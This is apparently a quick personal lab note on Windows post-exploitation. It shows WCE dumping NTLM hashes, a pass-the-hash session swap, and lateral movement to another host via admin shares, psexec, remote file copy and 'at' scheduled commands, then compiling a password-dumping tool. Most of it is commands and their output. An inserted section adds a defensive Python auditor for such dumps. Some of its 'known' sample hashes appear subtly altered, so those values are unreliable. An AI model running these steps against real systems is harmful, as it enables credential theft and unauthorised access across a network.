Testing some hashdump and lateral movement techniques

Some time ago I tested some techniques, now published quick and dirty as a note for whoever might find it interesting.

Test WCE
Source: http://www.ampliasecurity.com

E:\wce_v1_42beta_x32>wce
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
dax:DAX-RYMZ48Z3EYO:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
DAX-RYMZ48Z3EYO$:ACME:00000000000000000000000000000000:4460E0BCB8CCF37D8A9E81XXXXXXXXXX

E:\wce_v1_42beta_x32>wce -s Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of current logon session (00168AB3h) to:
Username: Administrator
domain: ACME
LMHash: E52CAC67419A9A224A3B10XXXXXXXXXX
NTHash: 8846F7EAEE8FB118AB06BDXXXXXXXXXX
NTLM credentials successfully changed!

E:\wce_v1_42beta_x32>dir \\192.168.16.2\c$
Volume in Laufwerk \\192.168.16.2\c$: hat keine Bezeichnung.
Volumeseriennummer: 5450-733C

Verzeichnis von \\192.168.16.2\c$

21.05.2016 14:44 0 AUTOEXEC.BAT
21.05.2016 15:56 <DIR> ClientApps
21.05.2016 14:44 0 CONFIG.SYS
21.05.2016 15:00 <DIR> Dokumente und Einstellungen
21.05.2016 17:33 2.229.504 Exchange Server Setup Progress.log
21.05.2016 15:24 <DIR> fax
21.05.2016 15:51 <DIR> Inetpub
21.05.2016 15:52 <DIR> Programme
21.05.2016 15:51 <DIR> Users Shared Folders
21.05.2016 17:33 <DIR> WINDOWS
21.05.2016 14:50 <DIR> wmpub
3 Datei(en) 2.229.504 Bytes
8 Verzeichnis(se), 16.708.521.984 Bytes frei
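Read from the reviewer's side, a dump like the one above already contains the findings that explain why the session swap worked: LM hashes are still stored for both accounts, and the domain Administrator and the local account dax carry the same hashes, i.e. the same password. The following script is an added example (not part of the post, WCE or pwdump) that parses WCE's user:domain:LMhash:NThash lines and reports exactly those weaknesses; the sample lines are constructed after the dump above, using the well-known hashes of the password "password" and a made-up machine account NT hash.

```python
import re
from collections import defaultdict

# Line format emitted by WCE and pwdump-style tools: user:domain:LMhash:NThash
LINE_RE = re.compile(r"^([^:]+):([^:]*):([0-9A-Fa-f]{32}):([0-9A-Fa-f]{32})$")
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"   # LM field when no LM hash is stored
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"   # NT hash of an empty password
ZERO_LM = "0" * 32                               # WCE prints this LM field for machine accounts

def parse_dump(text):
    """Return the credential rows of a dump, skipping banner and help lines."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, domain, lm, nt = m.groups()
            rows.append({"user": user, "domain": domain, "lm": lm.upper(), "nt": nt.upper()})
    return rows

def audit(rows):
    """Flag what a reviewer reports from such a dump: stored LM hashes,
    empty passwords and one password shared between several accounts."""
    findings = []
    by_nt = defaultdict(list)
    for r in rows:
        name = f"{r['domain']}\\{r['user']}"
        machine = r["user"].endswith("$")          # random, unique machine passwords: no reuse check
        if not machine and r["lm"] not in (EMPTY_LM, ZERO_LM):
            findings.append(("lm_hash_stored", name))   # LM hashes kept: NoLMHash not enforced
        if r["nt"] == EMPTY_NT:
            findings.append(("empty_password", name))
        if not machine:
            by_nt[r["nt"]].append(name)
    for names in by_nt.values():
        if len(names) > 1:                          # same NT hash = same password on several accounts
            findings.append(("shared_password", " = ".join(sorted(names))))
    return findings

# Constructed sample modelled on the WCE output above (hashes of "password", made-up machine hash).
SAMPLE = """WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security
Use -h for help.

Administrator:ACME:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
dax:DAX-RYMZ48Z3EYO:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
DAX-RYMZ48Z3EYO$:ACME:00000000000000000000000000000000:4460E0BCB8CCF37D8A9E81C0C8D8F9A1
"""

if __name__ == "__main__":
    for kind, detail in audit(parse_dump(SAMPLE)):
        print(f"{kind}: {detail}")
```

The two findings it prints for the sample are what the post then exploits: a shared admin password across machines is what makes the swapped session valid on 192.168.16.2, and a per-host unique local administrator password plus NoLMHash would have stopped it.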

But for remote execution psexec is needed:

E:\wce_v1_42beta_x32>..\PSTools\psexec \\192.168.16.2 ipconfig

PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - http://www.sysinternals.com

Windows-IP-Konfiguration

Ethernet-Adapter LAN-Verbindung des Servers:

Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
ipconfig exited on 192.168.16.2 with error code 0.

E:\wce_v1_42beta_x32>copy wce.exe \\192.168.16.2\c$
1 Datei(en) kopiert.

-> worked

E:\wce_v1_42beta_x32>del wce.exe \\192.168.16.2\c$
Möchten Sie "\\192.168.16.2\c$\*" löschen (J/N)? J

E:\wce_v1_42beta_x32>md \\192.168.16.2\c$\temp

Running commands with at

E:\wce_v1_42beta_x32>at \\192.168.16.2 18:35 cmd /c "ipconfig > c:\temp\ipconf.txt"
Neuer Auftrag hinzugefügt. Kennung = 1

E:\wce_v1_42beta_x32>move \\192.168.16.2\c$\temp\ipconf.txt .

E:\wce_v1_42beta_x32>type ipconf.txt

Windows-IP-Konfiguration

Ethernet-Adapter LAN-Verbindung des Servers:

Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :

Test pwdump

Source (seems to be down):
http://52.25.198.231/blog/2015/09/02/reading-windows-password/
https://github.com/khuangia/wce
Fork:
https://github.com/govolution/wce

32-bit only, as far as I remember.

C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl getpwd.cpp /link psapi.lib advapi32.lib
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.

getpwd.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.

/out:getpwd.exe
psapi.lib
advapi32.lib
getpwd.obj

C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl /LD getpwd_dll.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.

getpwd_dll.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.

/out:getpwd_dll.dll
/dll
/implib:getpwd_dll.lib
getpwd_dll.obj
Creating library getpwd_dll.lib and object getpwd_dll.exp

-> then use it ;).
